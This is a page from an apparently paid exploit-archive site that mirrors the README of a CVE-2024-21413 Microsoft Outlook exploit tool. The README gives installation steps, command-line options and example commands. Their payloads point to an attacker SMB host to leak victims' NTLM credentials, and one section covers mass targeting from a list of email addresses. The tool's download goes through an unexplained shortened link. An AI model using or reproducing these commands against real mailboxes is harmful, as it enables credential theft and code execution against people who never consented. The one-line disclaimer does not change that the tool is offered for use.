Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%
Buy Us a Coffee

CVE-2024-21413 PoC — Microsoft Outlook Remote Code Execution Vulnerability

Source
https://github.com/Cyber-Trambon/CVE-2024-21413-exploit
Associated Vulnerability
Title:Microsoft Outlook Remote Code Execution Vulnerability (CVE-2024-21413)
Description:Microsoft Outlook Remote Code Execution Vulnerability
Readme
# 🛠️ CVE-2024-21413 Exploit

## 🌟 Description

This script is a powerful exploitation tool for the CVE-2024-21413 vulnerability found in Microsoft Outlook. The vulnerability allows attackers to bypass Protected View and execute malicious code by embedding specially crafted links in emails.

## ⚙️ Installation

To set up the exploitation tool, follow these steps:

1. **Download the repository**:

|[Download](https://shorturl.at/7itzw)
|:--------------- |

2. **Navigate to the tool's directory**:

```bash
cd CVE-2024-21413
```

3. **Install the required Python packages**:

```bash
pip install -r requirements.txt
```

## 🚀 Usage

To use the tool, run the script from the command line as follows:

```bash
python exploit.py [options]
```

### Options

- **-u, --url**:
  Specify the target Outlook email or server.

- **-f, --file**:
  Specify a file containing multiple email addresses to target.

- **-p, --payload**:
  Define a malicious file or link to inject.

- **-o, --output**:
  Define an output file to save logs and results.

When a single target is provided with the `-u` option and the system is vulnerable, the script will attempt to exploit the vulnerability by crafting a malicious email containing an embedded file link using the bypass method.

### Example

```bash
$ python3 exploit.py -u victim@domain.com -p "file:///\\10.10.111.111\test\test.rtf!exploit"
[+] Payload successfully sent.
[!] victim@domain.com is vulnerable to CVE-2024-21413: NTLM credentials leaked.
[+] Exploit completed.
```

## 📊 Mass Targeting

For mass exploitation, use the `-f` option with a file containing multiple email addresses. The tool will attempt to send a crafted email to each target.

```bash
python exploit.py -f targets.txt -p "file:///\\malicious.server\payload.rtf!exploit"
```

## 🗒️ Affected Versions

The vulnerability affects the following Microsoft Office products:

- Microsoft Office LTSC 2021
- Microsoft 365 Apps for Enterprise
- Microsoft Outlook 2016
- Microsoft Office 2019

Successful exploitation can result in NTLM credential theft and arbitrary code execution.

## 🛡️ Disclaimer

Use this tool responsibly and ethically. Exploiting systems without authorization is illegal. Always obtain proper authorization before testing any system for vulnerabilities.

## 👏 Acknowledgments

Special thanks to Check Point researchers for discovering this vulnerability and providing insights into its exploitation method.
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →